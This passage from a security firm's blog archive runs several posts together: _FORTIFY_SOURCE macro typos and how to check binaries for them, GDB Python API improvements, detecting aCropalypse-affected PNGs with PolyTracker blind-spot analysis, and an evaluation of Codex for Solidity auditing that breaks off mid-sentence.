- trailofbits/cb-multios#96 (Yeah, we also had this issue!)
- lavabit/libdime#49
- lavabit/magma#155
- Jackysi/advancedtomato#454
- adaptivecomputing/torque#474
- gstrauss/mcdb#14
- Homegear/Homegear#364
- sergey-dryabzhinsky/dedupsqlfs#235
- randlabs/algorand-windows-node#5
- rpodgorny/unionfs-fuse#131
- cgaebel/pipe#15
- jkrh/kvms#48
- angaza/nexus-embedded#8
- hashbang/book#24

We’ll show you how to test your code to avoid this issue, which could make it easier to exploit bugs.

How source fortification works

Source fortification is a security mitigation that replaces certain function calls with more secure wrappers that perform additional runtime or compile-time checks. Source fortification is enabled by defining a special macro, _FORTIFY_SOURCE, with a value of 1, 2, or 3 and compiling the program with optimizations. The higher the value, the more functions are fortified and the more checks are performed. Also, the libc library and the compiler must support the source fortification option, which is the case for glibc, Apple Libc, gcc, and LLVM/Clang, but not musl libc and uClibc-ng. The implementation specifics may also vary. 
For example, level value 3 was only recently added in glibc 2.34, but it does not seem to be available in Apple Libc. The following example shows source fortification in action. Whether or not we enable the mitigation, the resulting binary will call either the strcpy function or its __strcpy_chk wrapper:

Figure 1: Compiler Explorer comparison of the assembly generated by the compiler.

In this case, the __strcpy_chk wrapper function is implemented by glibc (source):

/* Copy SRC to DEST and check DEST buffer overflow */
char *
__strcpy_chk (char *dest, const char *src, size_t destlen)
{
  size_t len = strlen (src);
  if (len >= destlen)
    __chk_fail ();
  return memcpy (dest, src, len + 1);
}

Figure 2: The __strcpy_chk function from glibc

As we can see, the wrapper takes one more argument—the destination buffer size—and then checks if the length of the source is bigger than the destination. If it is, the wrapper calls the __chk_fail function, which aborts the process. Figure 1 shows that the compiled code passes the correct length of the dest destination buffer in the mov edx, 10 instruction.

Tpying is hard

Since a preprocessor macro determines source fortification, a typo in the macro spelling effectively disables it, and neither the libc nor the compiler catches this issue, unlike typos made in other security hardening options enabled with compiler flags instead of macros. Effectively, if you pass “-DFORTIFY_SOURCE=2 -O2” instead of “-D_FORTIFY_SOURCE=2 -O2” to the compiler, source fortification won’t be enabled, and the wrapper functions will not be used:

Figure 3: Assembly when making a typo in the _FORTIFY_SOURCE macro (created with Compiler Explorer)

I searched for this and similar bug patterns using the grep.app, sourcegraph.com, and cs.github.com tools, and I sent 20 pull requests. Three of my pull requests were slightly different and fall outside the list at the beginning of this post:

- kometchtech/docker-build#50 used “-FORTIFY_SOURCE=2 -O2”. This is not detected as a compiler error because it is a “-F<dir>” flag, which sets the “search path for framework include files.”
- ned14/quickcpplib#37 had a typo in the “-fsanitize=safe-stack” compiler flag. Although compilers detect such a typo, the flag was used in a CMake script to determine if the compiler supports the safe stack mitigation. The CMake script never enabled this mitigation because of this typo. I found this case thanks to my colleague, Paweł Płatek, who suggested checking whether compilers detect typos in security-related flags. Although they do, flag typos may still cause issues during compiler feature detection.
- OpenImageIO/oiio#3729 was an invalid report/PR since the “-DFORTIFY_SOURCE=2” option provided a value for a CMake variable that eventually led to setting the proper _FORTIFY_SOURCE macro. (However, that is still an unfortunate CMake variable name.)

The three code search tools I used can find more cases like this, but I didn’t send PRs for all of them, like when a project seemed abandoned.

Testing _FORTIFY_SOURCE mitigation

In addition to testing code during continuous integration, developers should also test the results of their build systems and the options they have chosen to enable. Apart from helping to detect regressions, this can also help developers understand what the options really do, like the fact that source fortification is disabled when optimizations are disabled. So, how do you see if you enabled source fortification correctly? 
You can scan the symbols used by your binary and ensure that the fortified source functions you expect to be used are really used. A simple Bash script like the one shown below can achieve this: if readelf --symbols /bin/ls | grep -q ' __snprintf_chk@'; then echo "snprintf is fortified";else echo "snprintf is not fortified";fi Figure 3: Simple Bash script to check for a fortified symbol However, in practice, you should just scan your binary for security mitigations with a binary analysis tool such as checksec.rs, BinSkim Binary Analyzer, Pwntools’ checksec, checksec.sh or winchecksec (a tool Trail of Bits created for checksec on Windows). Before using a tool, it’s a good idea to double-check if it works properly. As referenced in the above list of bugs, BinSkim had a typo in its recommendations text. Another bug, this time in checksec.sh, resulted in incorrect results in “Home Router Security Report 2020.” What was the reason for the bug in checksec.sh? If a scanned binary used stack canaries, the “__stack_chk_fail” symbol (used to abort the program if the canary was corrupted) incorrectly accounted for source fortification. This is because checksec.sh looked for a “_chk” string in the output of the readelf –symbols command, instead of expecting that the symbol name suffix matches the “_chk” string. This bug appears to be fixed after the issues reported in slimm609/checksec.sh#103 and slimm609/checksec.sh#130 were resolved. It is also worth noting that both BinSkim and checksec.sh can tell you how many fortifiable functions there are vs. how many are fortified in your binary. How do they do that? BinSkim keeps a hard-coded list of fortifiable function names deduced from glibc, and checksec.sh scans your own glibc to determine those names. Although this can prevent some false positives, those solutions are still imperfect. What if your binary is linked against a different libc or, in the case of BinSkim, what if glibc added new fortifiable functions? Last but not least, none of the tools detect the actual fortification level used, but perhaps that only impacts the number of fortifiable functions. I am not sure. Fun fact: Typo in Nginx During this research, I also found out that the Nginx package from Debian had this kind of typo bug in the past. Currently, the Nginx package uses a dpkg-buildflags tool that provides the proper macro flag: $ dpkg-buildflags --get CPPFLAGS-Wdate-time -D_FORTIFY_SOURCE=2$ dpkg-buildflags --get CFLAGS-g -O2 -fdebug-prefix-map=/tmp/nginx-1.18.0=. -fstack-protector-strong -Wformat -Werror=format-security It is weird that the source fortification and optimization flags are separated into CFLAGS and CPPFLAGS. Wouldn’t some projects use one but not the other and miss some of the options? I haven’t checked that. Some wishful thinking In an ideal world, a compiler would automatically include information about all necessary security mitigations and hardening options in the generated binary. However, we are limited by the incomplete information we must work with. When testing your build system, there doesn’t seem to be a silver bullet, especially since not all security mitigations are straightforward to check, and some may require analyzing the resulting assembly. We haven’t analyzed the tools exhaustively, but we would probably recommend using checksec.rs or BinSkim for Linux and winchecksec for Windows. We also plan to extend Blight, our build instrumentation tool, to find the mistakes described in this blog post during build time. 
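In the meantime, a rough version of that build-time check is easy to script yourself. The sketch below is an illustrative helper, not Blight and not any of the tools named above: it assumes your build exports a compile_commands.json database (for example via CMake's CMAKE_EXPORT_COMPILE_COMMANDS) and flags compile commands that misspell the macro or omit it entirely. The file name and regexes are assumptions about your build setup.

```python
#!/usr/bin/env python3
"""Flag compile commands that misspell or omit _FORTIFY_SOURCE.

A minimal sketch: it assumes a compile_commands.json is available and does
not check that optimizations are enabled, which fortification also requires.
"""
import json
import re
import sys

GOOD = re.compile(r"-D_FORTIFY_SOURCE=[123]\b")
# Catches -DFORTIFY_SOURCE=2 (missing underscore) and -FORTIFY_SOURCE=2
# (silently accepted as the -F<dir> framework search path flag).
TYPO = re.compile(r"-D?FORTIFY_SOURCE=")

def main(path: str = "compile_commands.json") -> int:
    problems = 0
    for entry in json.load(open(path)):
        cmd = entry.get("command") or " ".join(entry.get("arguments", []))
        if TYPO.search(cmd) or not GOOD.search(cmd):
            print(f"[!] {entry['file']}: _FORTIFY_SOURCE missing or misspelled")
            problems += 1
    return 1 if problems else 0

if __name__ == "__main__":
    sys.exit(main(*sys.argv[1:]))
```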
Even so, it probably still makes sense to scan the resulting binary to confirm what the compiler and linker are doing. Finally, contact us if you find this research interesting and you want to secure your software further, as we love to work on hard security problems. By Matheus Branco Borella, University of São Paulo As a winter associate at Trail of Bits, my goal was to make two improvements to the GNU Project Debugger (GDB): make it run faster and improve its Python API to support and improve tools that rely on it, like Pwndbg. The main goal was to run symbol parsing in parallel and better use all available CPU cores. I ultimately implemented three changes that enhanced GDB’s Python API. Beyond the actual code, I also learned about upstreaming patches in GDB. This process can take a while, has a bit of a learning curve, and involves a lot of back and forth with the project’s maintainers. I’ll discuss this in the post, and you can also follow along as my work is still being debated in the GDB patches mailing list. Why make GDB faster? GDB has three ways to load DWARF symbols from a program: Partial symbol table loader: The index loader is responsible for loading in symbol names and connecting them to their respective compilation units (CUs), leaving the parsing and building of their symbol tables to the full loader. Parsing will be done later only when full information about the symbol is required. Full symbol table loader: Finishes the work the index loader has left for later by parsing the CUs and building their symbol tables as needed. This loader fully parses the DWARF information in the file and stores it in memory. Index parser: ELFs can have a special .gdb_index section, added either with the –gdb-index linker flag or with the gdb-add-index tool provided by GDB. The tool stores an index for the internal symbol table that allows GDB to skip the index construction pass, significantly reducing the time required to load the binary in GDB. The original idea was to port the parallel parsing approach in drgn, Meta’s open-source debugger, to GDB. Parallel parsing had already been implemented for the index loader, leaving only the full loader and the index parser as potential next candidates in line for parallelization. You can think of GDB’s parsing routines as split into concurrent tasks on a per-CU basis since they’re already invoked sequentially once per CU. However, this understanding has a major issue: despite the ostensive separation of the data, it is not separated into data that is fully read-write, partially read-write with implicit synchronization, and read-only. The parsing subroutines fully expect all of these data structures to be read-write, at least to a degree. While solving most of these is a simple case of splitting the values into separate read-write copies (one owned by each thread), things like the registries, the caches, and particularly the obstacks are much harder to move to a concurrent model. What’s an obstack? General purpose allocations, like malloc(), are time-consuming. They may not be efficient when users need to allocate many small objects as quickly as possible since they store metadata within each allocation. Enter allocation stacks. Each new object is allocated on the top and freed from the top in order. The GNU Obstack, an implementation of such an allocator, is used heavily in GDB. 
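If you have not run into obstacks before, the core idea can be modeled in a few lines: objects are pushed onto a region owned by some container, are only ever freed from the top, and disappear along with their owner. The Python sketch below is a loose analogy for illustration only, not GDB's C implementation:

```python
class Arena:
    """Toy obstack-like allocator: allocations live exactly as long as the arena."""

    def __init__(self):
        self._objects = []

    def alloc(self, obj):
        # Allocation is just a push onto the top of the stack.
        self._objects.append(obj)
        return obj

    def mark(self):
        # Remember the current top so everything above it can be released later.
        return len(self._objects)

    def release_to(self, mark):
        # Free from the top only; objects in the middle cannot be freed individually.
        del self._objects[mark:]
```

A container that owns an arena (think of an objfile) takes every object allocated from that arena with it when it is destroyed, which is exactly the lifetime coupling that matters below.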
Each reasonably long-lived container object, including objfile and gdbarch, has its instance of an obstack and is used to hold the objects it references and frees them all at once, together with the object itself. If you’re knowledgeable on object lifetime tracking—be it dynamic, like you’d get with std::shared_ptr, or static, like with references in Rust—the last paragraph will have sounded familiar. Judging by how obstack allocations are used in GDB, someone might assume there is a way to guarantee that objects will live as long as the container that owns them. After discussing this with others in the IRC and mailing list, I reached two conclusions: it would take a considerable amount of time to investigate it, and I was better off prioritizing the Python API so that I could have a chance at completing the improvements on time. Ultimately, I spent most of my time on those attainable goals. GDB objects __repr__ methods The first change is fairly simple. It adds __repr__() implementations to a handful of types in the GDB Python API. This change makes the messages we get from inspecting types in the Python REPL more informative about what those types represent. Previously, we would get something like this, which is hardly helpful (note: pi is the GDB command to run the Python REPL): (gdb) pi>>> gdb.lookup_type("char") Now, we can get the following, which tells us what kind of type this is, as well as its name, rather than where the object is located in memory: (gdb) pi>>> gdb.lookup_type("char") This also applies to gdb.Architecture, gdb.Block, gdb.Breakpoint, gdb.BreakpointLocation, and gdb.Symbol. This helped me understand how GDB interfaces with Python and how the Python C API generally works. It allowed me to add my own functions and types later. Types ahoy! The second change adds the ability to create types from the Python API, where previously, you could only query for existing types using gdb.lookup_type(). Now you can directly create any primitive type supported by GDB, which can be pretty handy if you’re working on code but don’t have the symbols for it, or if you’re writing plugins to help people work with that sort of code. Types from weird extra binaries need not apply! GDB supports a fairly large number of types. All of them can be created directly using gdb.init_type or one of the specialized gdb.init_*_type functions, which let you specify parameters relevant to the type being created. Most of them work similarly, except for gdb.init_float_type, which has its own new gdb.FloatFormat type to go along with it. This lets you specify how the floating point type you’re trying to create is laid out in memory. An extra consideration that comes with this change is where exactly the memory for these new types comes from. Since these functions are based on functions already available internally in GDB, and since these functions use the obstack from a given objfile, the obstack is the memory source for these allocations. This has one big advantage: objects that reference these types and belong to the same objfile are guaranteed never to outlive them. You may already have realized a significant drawback to this method: any type allocated on it has a high chance of not being on the top of the stack when the Python runtime frees it. So regardless of their real lifetime requirements, types can be freed only along with the objfile that owns them. The main implication is that unreachable types will leak their memory for the lifetime of the objfile. 
Keeping track of the initialization of the type by hand would require a deeper change to the existing type object infrastructure. This is too ambitious for a first patch. Here are a few examples of this method in action:

(gdb) pi
>>> objfile = gdb.lookup_objfile("servo")
>>>
>>> # Time to standardize integer extensions. :^)
>>> gdb.init_type(objfile, gdb.TYPE_CODE_INT, 24, "long short int")

This creates a new 24-bit integer type named "long short int":

(gdb) pi
>>> objfile = gdb.lookup_objfile("servo")
>>>
>>> ff = gdb.FloatFormat()
>>> ff.totalsize = 32
>>> ff.sign_start = 0
>>> ff.exp_start = 1
>>> ff.exp_len = 8
>>> ff.man_start = 9
>>> ff.man_len = 23
>>> ff.intbit = False
>>>
>>> gdb.init_float_type(objfile, ff, "floatier")

This creates a new floating point type reminiscent of the one available in standard x86 machines.

What about the symbols?

The third change adds the ability to register three kinds of symbols: types, goto labels, and statics. This makes it much easier to add new symbols, which is especially useful if you're reverse engineering and don't have any original symbols. Without this patch, the main way to add new symbols involves adding them to a separate file, compiling the file to the target architecture, and loading it into GDB after the base program is loaded with the add-symbol-file command. GDB's internal symbol infrastructure is mostly not meant for on-the-fly additions. Let's look at how GDB creates, stores, and looks up symbols. Symbols in GDB are found through pointers deep inside structures called compunit_symtab. These structures are set up through a builder that allows symbols to be added to the table as it's being built. This builder is later responsible for registering the new structure with the (in the case of this patch) objfile that owns it. In the objfile case, these tables are stored in a list that, during lookup (disregarding the symbol lookup cache), is traversed until a symbol matching the given requirements is found in one of the tables. Currently, tables aren't set up so that symbols can be added at will after they have been built. So if we don't want to make deep changes to GDB before the first patch, we must find a way around this limitation. What I landed on was building a new symbol table and stringing it to the end of the list for every new symbol. Although this is a rather inefficient approach, it's sufficient to get the feature to work. As this patch continues to be upstreamed, I aim to iron out and improve the mechanism by which this functionality is implemented. Lastly, I'd like to show an example of a new type being created and registered as a symbol for future lookup:

(gdb) pi
>>> objfile = gdb.lookup_objfile("servo")
>>> type = gdb.init_type(objfile, gdb.TYPE_CODE_INT, 24, "long short int")
>>> objfile.add_type_symbol("long short int", type)
>>> gdb.lookup_type("long short int")

Getting it all merged

Overall, this winter at Trail of Bits produced more informative messages, the ability to create types, and the ability to register new symbols in GDB's Python API, all of which are helpful when you don't have symbols for the code you're working on. GDB is old school regarding how it handles contributions. Its maintainers use email to submit, test, and comment on patches before they are upstreamed. This generally means there's a very rigid etiquette to follow when submitting a patch. As someone who had never dealt with email-based projects, my first attempt to submit a patch was bad.
I cobbled together a text file with the output of git diff and then wrote the entire message by hand before sending it through a client that poorly handled non-UNIX line endings. This caused a mess that, understandably, none of the maintainers in the list inclined to patch in and test. Still, they were nice enough to tell me I should’ve done it using Git’s built-in email functionality: git send-email directly. After that particular episode, I put in the time to split off my changes into proper branches and to rebase them so that they would all be condensed into a single commit per major change. This created a more rational and descriptive message that covers the entire change and is much better suited for use with git send-email. Since then, things have been rolling pretty smoothly, though there has been a lot of back and forth trying to get all of my changes in. While the three changes have already been submitted, the one implementing __repr__() is further down the pipeline, while the other two are still awaiting review. Keep an eye out for them! By Henrik Brodin, Lead Security Engineer, Research The aCropalypse is upon us! Last week, news about CVE-2023-21036, nicknamed the “aCropalypse,” spread across Twitter and other media, and I quickly realized that the underlying flaw could be detected by our tool, PolyTracker. I’ll explain how PolyTracker can detect files affected by the vulnerability even without specific file format knowledge, which parts of a file can become subject to recovery using acropalypse.app, and how Google and Microsoft could have caught this bug by using our tools. Coincidentally, my colleagues, Evan Sultanik and Marek Surovič, and I wrote a paper that describes this class of bugs, defines a novel approach for detecting them, and introduces our implementation and tooling. It will appear at this year’s workshop on Language-Theoretic Security (LangSec) at the IEEE Security and Privacy Symposium. We use PolyTracker to instrument the image parser, libpng. (Any parser will do, not just aCropalyptic ones.) The PolyTracker instrumentation tells us which portions of the input file are completely ignored by the parser, which we call blind spots. Blind spots are almost always indicators of design flaws in the file format, malformation in the input file, and/or a bug in the parser. Normal images should have almost no blind spots, but parsing malformed aCropalyptic images through libpng reveals the cropped data in a large blind spot. The aCropalypse bugs could have been caught if the vulnerable products had been instrumented with PolyTracker and their output tested for blind spots. # parse the screenshot with an instrumented version of pngtest$ ./pngtest.instrumented re3eot.png.png out_re3eot.png.png# ask polytracker to identify any blindspots in the file$ polytracker cavities polytracker.tdag Re3eot.png,697120,1044358# found a blind spot starting at offset 697120 (size ~300KiB), it is ignored and contains the cropped out image data that could be retrieved Understanding the aCropalypse According to this tweet, it is possible to recover parts of an original image from a cropped or redacted screenshot. The TL;DR is that when the Google Pixel built-in screenshot editing tool, Markup, is used to crop or resize an image, it overwrites the original image, but only up to the offset where the new image ends. Any data from the original image after that offset is left intact in the file. 
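The underlying failure mode is easy to reproduce in any language: open an existing file for writing without truncating it, then write fewer bytes than it already contains. The Python sketch below only illustrates the effect; it is not the actual Markup code, and the file name is made up:

```python
import os

# Create a stand-in for the original, full-size screenshot.
with open("shot.png", "wb") as f:
    f.write(os.urandom(1_000_000))

# Overwrite it the buggy way: write-only, but without O_TRUNC.
fd = os.open("shot.png", os.O_WRONLY)
os.write(fd, b"a much smaller cropped image")
os.close(fd)

# The file keeps its old size; everything past the new data survives on disk.
print(os.path.getsize("shot.png"))  # 1000000
```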
David Buchanan devised an algorithm to recover the original image data still left in the file; you can read more about the specifics on his blog. More recently, Chris Blume identified a similar vulnerability for the Windows Snipping Tool. The methodology we describe here for the Markup tool can be used on images produced by the Windows Snipping Tool. PolyTracker has a feature we introduced a couple of years ago called blind spot detection. We define blind spots as the set of input bytes whose data flow never influences either the control flow that leads to an output or an output itself. Or, in layman’s terms, unused file data that can be altered to have any content without affecting the output. The cropped-out regions of an aCropalypse image are, by definition, blind spots, so PolyTracker should be able to detect them! One of the challenges of tracking input bytes and detecting blind spots for real-world inputs like PNG images or PDF documents is taint explosion. The PNG file format contains compressed chunks of image data. Compression is especially keen on contributing to taint explosion as input bytes combine in many ways to produce output bytes. PolyTracker’s unique representation of the taint structure allows us to track 2^31 unique taint labels, which is necessary for analyzing taints propagated during zlib-decompression of image data. aCropalyptic files will have Blind Spots when processed To understand why the aCropalypse vulnerability produces blind spots, we need to combine our knowledge of the vulnerability with the description of blind spots. When parsing a PNG file with a PNG parser, the parser will interpret the header data and consume chunks according to the PNG specification. In particular, it will end at a chunk with type IEND, even if that is not at the actual end of the file. We use PolyTracker to instrument a tool (pngtest from the libpng project) that reads PNG files and writes them to disk again. This will produce an additional output file, called polytracker.tdag, that captures the data flow from the runtime trace. Using that file and PolyTracker’s blind spot detection feature, we can enumerate the input bytes that do not affect the resulting image. Remember, these are the bytes of the input file that neither affect any control flow, nor end up (potentially mixed with other data) in the output file. They have no actual meaning in interpreting the format for the given parser. Show me! Using the PolyTracker-instrumented pngtest application, we load, parse, and then store the below image to disk again. During this processing, we track all input bytes through PNG and zlib processing until they eventually reach the output file in some form. We use a Docker image containing the PolyTracker instrumented pngtest application. $ docker run -ti --rm -v $(pwd):/workdir acropalypse$ cd /workdir$ /polytracker/acropalypse/libpng-1.6.39/pngtest.instrumented re3eot.png.png out_re3eot.png.png The re3eot.png image is 1044358 bytes in size, whereas the out_re3eot.png is 697,182 bytes. Although this indicates a fairly large reduction in size, at this point we can’t tell why; it could, for example, be the result of different compression settings. 
Next, let’s find the blind spots from this process: $ polytracker cavities polytracker.tdag 100%|███████████████████| 1048576/1048576 [00:01<00:00, 684922.43it/s]re3eot.png,697120,1044358out_re3eot.png,37,697182 The output we are interested in is: re3eot.png,697120,1044358 This tells us that the data starting from offset 697,120 to the end of the file was ignored when producing the output image. We have found a blind spot! The additional 347,238 bytes of unused data could be left from an original image—an indication of the aCropalypse vulnerability. Let’s use the acropalypse.app web page to see if we can recover it. This indicates that the file was in fact produced by the vulnerable application. At this point, we know that the image contains data from the original image at the end, as that is the core of the vulnerability. We also know the exact location and extent of that data (according to the blind spot’s starting offset and size). To confirm that the data is in fact a blind spot, let’s manually crop the original image and redo the pngtest operation to ensure that the resulting files are in fact equal. First, let’s copy only the portion that is not a blind spot—the data that is used to produce the output image. $ dd if=re3eot.png of=manually_cropped_re3eot.png count=1 bs=697120 Next, let’s run the pngtest application again: $ /polytracker/acropalypse/libpng-1.6.39/pngtest.instrumented manually_cropped_re3eot.png out_manually_cropped_re3eot.png If our assumption—that only the first 697,120 bytes were used to produce the output image— is correct, we should have two identical output files, despite the removal of 347,238 bytes from the manually_cropped_re3eot.png input file. $ sha1sum out_manually_cropped_re3eot.png out_re3eot.png8f4a0417da4c68754d2f85e059ee2ad87c02318f out_manually_cropped_re3eot.png8f4a0417da4c68754d2f85e059ee2ad87c02318f out_re3eot.png Success! To ensure that the manually cropped file isn’t still affected by the vulnerability, let’s use the web page to try to reconstruct additional image data in the file. This attempt was unsuccessful, as we have removed the original image contents. (Yes, I have checked the cropped screenshot for blind spots 😁). To better understand why the blind spot started at the particular offset, we need to examine the structure of the original image. PolyFile to the rescue PolyTracker has a sibling tool: PolyFile, a pure Python cleanroom implementation of libmagic, with instrumented parsing from Kaitai struct and an interactive hex viewer. We will use PolyFile’s ability to produce an HTML rendering of the file structure to understand why file processing ends before the file ends. First, we use the following command to produce an HTML file representing the file format: $ polyfile --html re3eot.html re3eot.png. When we open the re3eot.html file in a browser, we’ll see an initial representation of the file. By repeatedly expanding the file structure on the left-hand side, we eventually reach the final chunk. As shown in the above picture, the final chunk, when interpreting the PNG-format, has type IEND. Following that chunk is the remaining data from the original file. Note how the superfluous data starts at offset 0xaa320—that is, 697,120, the exact same offset of the identified blind spot. If you were to scroll all the way to the end, you would find an additional IEND structure (from the original image), but that is not interpreted as a valid part of the PNG file. 
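If you only care about this specific PNG symptom, a format-aware check is also easy to write. The sketch below walks the chunk list and reports how many bytes follow the first IEND chunk. Unlike the blind-spot approach, it needs PNG-specific knowledge baked in, and the script itself is illustrative rather than part of PolyTracker or PolyFile:

```python
import struct
import sys

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def trailing_bytes(path):
    """Return the number of bytes after the first IEND chunk."""
    data = open(path, "rb").read()
    if not data.startswith(PNG_MAGIC):
        raise ValueError("not a PNG file")
    off = len(PNG_MAGIC)
    while off + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        off += 8 + length + 4  # chunk header + payload + CRC
        if ctype == b"IEND":
            return len(data) - off
    return 0

if __name__ == "__main__":
    extra = trailing_bytes(sys.argv[1])
    print(f"{extra} bytes after IEND" if extra else "no data after IEND")
```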
It doesn’t stop here Having almost no knowledge of the PNG file format, we were able to use PolyTracker instrumentation on an existing PNG processing application to detect not only files that have blind spots, but also their exact location and extent. PolyTracker can detect blind spots anywhere in the file, not only at the end. Even though we analyzed PNG files, PolyTracker isn’t limited to a specific format. We have previously analyzed conversion of PDFs to PostScript using MμPDF. The same technique is valid for any application that does a load/store or deserialize/serialize operation. To further increase our understanding of the format and the effects of the vulnerability, we used PolyFile to inspect the file structure. These are just a couple of use cases for our tools, there are plenty of others! We encourage you to try our PolyTracker and PolyFile tools yourself to see how they can help you identify unexpected processing and prevent vulnerabilities similar to the aCropalypse in your application. Acknowledgements This research was supported in part by the Defense Advanced Research Projects Agency (DARPA) SafeDocs program as a subcontractor to Galois under HR0011-19-C-0073. The views, opinions, and findings expressed are those of the author and should not be interpreted as representing the official views or policies of the Department of Defense or the U.S. Government. Many thanks to Evan Sultanik, Marek Surovič, Michael Brown, Trent Brunson, Filipe Casal, Peter Goodman, Kelly Kaoudis, Lisa Overall, Stefan Nagy, Bill Harris, Nichole Schimanski, Mark Tullsen, Walt Woods, Peter Wyatt, Ange Albertini, and Sergey Bratus for their invaluable feedback on the approach and tooling. Thanks to Ange Albertini for suggesting angles morts—French for “blind spots”—to name the concept, and to Will Tan for sharing a file affected by the vulnerability. Special thanks to Carson Harmon, the original creator of PolyTracker, whose ideas and discussions germinated this research, and Evan Sultanik for helping write this blog post. By Artem Dinaburg, Chief Technology Officer; Josselin Feist, Principal Engineer; and Riccardo Schirone, Security Engineer Is artificial intelligence (AI) capable of powering software security audits? Over the last four months, we piloted a project called Toucan to find out. Toucan was intended to integrate OpenAI’s Codex into our Solidity auditing workflow. This experiment went far beyond writing “where is the bug?” in a prompt and expecting sound and complete results. Our multi-functional team, consisting of auditors, developers, and machine learning (ML) experts, put serious work into prompt engineering and developed a custom prompting framework that worked around some frustrations and limitations of current large language model (LLM) tooling, such as working with incorrect and inconsistent results, handling rate limits, and creating complex, templated chains of prompts. At every step, we evaluated how effective Toucan was and whether it would make our auditors more productive or slow them down with false positives. The technology is not yet ready for security audits for three main reasons: The models are not able to reason well about certain higher-level concepts, such as ownership of contracts, re-entrancy, and fee distribution. The software ecosystem around integrating large language models with traditional software is too crude and everything is cumbersome; there are virtually no developer-oriented tools, libraries, and type systems that work with uncertainty. 
There is a lack of development and debugging tools for prompt creation. To develop the libraries, language features, and tooling that will integrate core LLM technologies with traditional software, far more resources will be required. Whoever successfully creates an LLM integration experience that developers love will create an incredible moat for their platform. The above criticism still applies to GPT-4. Although it was released only a few days before the publication of this blog post, we quickly ran some of our experiments against GPT-4 (manually, via the ChatGPT interface). We conclude that GPT-4 presents an incremental improvement at analyzing Solidity code. While GPT-4 is considerably better than GPT-3.5 (ChatGPT) at analyzing Solidity, it is still missing key features, such as the ability to reason about cross-function reentrancy and inter-function relationships in general. There are also some capability regressions from Codex, like identification of variables, arithmetic expressions, and understanding of integer overflow. It is possible that with the proper prompting and context, GPT-4 could finally reason about these concepts. We look forward to experimenting more when API access to the large context GPT-4 model is released. We are still excited at the prospect of what Codex and similar LLMs can provide: analysis capabilities that can be bootstrapped with relatively little effort. Although it does not match the fidelity of good algorithmic tools, for situations where no code analysis tools exist, something imperfect may be much better than having nothing. Toucan was one of our first experiments with using LLMs for software security. We will continue to research AI-based tooling, integrating it into our workflow where appropriate, like auto-generating documentation for smart contracts under audit. AI-based capabilities are constantly improving, and we are eager to try newer, more capable technologies. We want AI tools, too Since we like to examine transformational and disruptive technologies, we evaluated OpenAI’s Codex for some internal analysis and transformation tasks and were very impressed with its abilities. For example, a recent intern integrated Codex within Ghidra to use it as a decompiler. This inspired us to see whether Codex could be applied to auditing Solidity smart contracts, given our expertise in tool development and smart contract assessments. Auditing blockchain code is an acquired skill that takes time to develop (which is why we offer apprenticeships). A good auditor must synthesize multiple insights from different domains, including finance, languages, virtual machine internals, nuances about ABIs, commonly used libraries, and complex interactions with things like pricing oracles. They must also work within realistic time constraints, so efficiency is key. We wanted Toucan to make human auditors better by increasing the amount of code they could investigate and the depth of the analysis they could accomplish. We were particularly excited because there was a chance that AI-based tools would be fundamentally better than traditional algorithmic-based tooling: it is possible to learn undecidable problems to an arbitrarily high accuracy, and program analysis bumps against undecidability all the time. We initially wanted to see if Codex could analyze code for higher-level problems that could not be examined via static analysis. 
Unfortunately, Codex did not provide satisfactory results because it could not reason about higher-level concepts, even though it could explain and describe them in words. We then pivoted to a different problem: could we use Codex to reduce the false positive rate from static analysis tools? After all, LLMs operate fundamentally different from our existing tools. Perhaps they provide enough signals to create new analyses previously untenable due to unacceptable false positives. Again, the answer was negative, as the number of failures was high even in average-sized code, and those failures were difficult to predict and characterize. Below we’ll discuss what we actually built and how we went about assessing Toucan’s capabilities. Was this worth our time? Our assessment does not meet the rigors of scientific research and should not be taken as such. We attempted to be empirical and data-driven in our evaluation, but our goal was to decide whether Toucan warranted further development effort—not scientific publication. At each point of Toucan development, we tried to assess whether we were on the right track. Before starting development, we manually used Codex to identify vulnerabilities that humans had found in specific open-source contracts—and with enough prompt engineering, Codex could. After we had the capability to try small examples, we focused on three main concepts that seemed within Codex’s capability to understand: ownership, re-entrancy, and integer overflow. (A quick note for the astute reader: Solidity 0.8 fixed most integer overflow issues; developing overflow checks was an exercise in evaluating Codex’s capability against past code.) We could, fairly successfully, identify vulnerabilities regarding these concepts in small, purpose-made examples. Finally, as we created enough tooling to automate asking questions against multiple larger contracts, we began to see the false positive and hallucination rates become too high.  Although we had some success with ever more complex prompts, it was still not enough to make Toucan viable. Below are some key takeaways from our experience. Codex does not fully grasp the higher-level concepts that we would like to ask about, and explaining them via complex prompt engineering does not always work or produce reliable results. We had originally intended to ask questions about higher-level concepts like ownership, re-entrancy, fee distribution, how pricing oracles are used, or even automated market makers (AMMs). Codex does not fully understand many of these abstract concepts, and asking about them failed in the initial evaluation stage. It somewhat comprehends the simplest concept — ownership — but even then it often cannot always correlate changes in the ‘owner’ variable with the concept of ownership. Codex does not appear to grasp re-entrancy attacks as a concept, even though it can describe them with natural language sentences. It is very easy to delude yourself by p-hacking a prompt that works for one or a few examples. It is extremely difficult to get a prompt that generalizes very well across multiple, diverse inputs. For example, when testing whether Toucan could reason about ownership, we initially tried seven small (<50 LOC) examples from which we could determine a baseline. After a thorough prompt-engineering effort, Toucan could pass six out of seven tests, with the lone failing test requiring complex logic to induce ownership change. 
We then tried the same prompt on eight larger programs (> 300 LOC), among which Toucan identified 15 potential changes of ownership, with four false positives—including complete hallucinations. However, when we tried slight permutations of the original small tests, we could usually get the prompt to fail given relatively minor changes in input. Similarly, for integer overflow tests, we could get Toucan to successfully identify overflows in 10 out of 11 small examples, with one false positive—but a larger set of five contracts produced 12 positives — with six of them being false, including four instances of complete hallucinations or inability to follow directions. Codex can be easily misled by small changes in syntax. Codex is not as precise as existing static analysis tools. It is easily confused by up comments, variable names, and small syntax changes. A particular thorn is reasoning about conditionals (e.g. ==, !=, <, >), where Codex will seemingly ignore them and create a conclusion based on function and variable names instead. Codex excels at abstract tasks that are difficult to define algorithmically, especially if errors in the output are acceptable. For example, Codex will excel at queries like “Which functions in this contract manipulate global state?” without having to define “global state” or “manipulate.” The results might not be exact, but they will often be good enough to experiment with new analysis ideas. And while it is possible to define queries like this algorithmically, it is infinitely easier to ask in plain language. The failure modes of Codex are not obvious to predict, but they are different from those of Slither and likely similar static analysis tools based on traditional algorithms. Figure 1: True positives (green) and false positives (red) found by Slither, Toucan, and both on some simple re-entrancy tests. The Toucan results are not encouraging. We tried looking at the true/false positive sets of Slither and Toucan, and found that each tool had a different set of 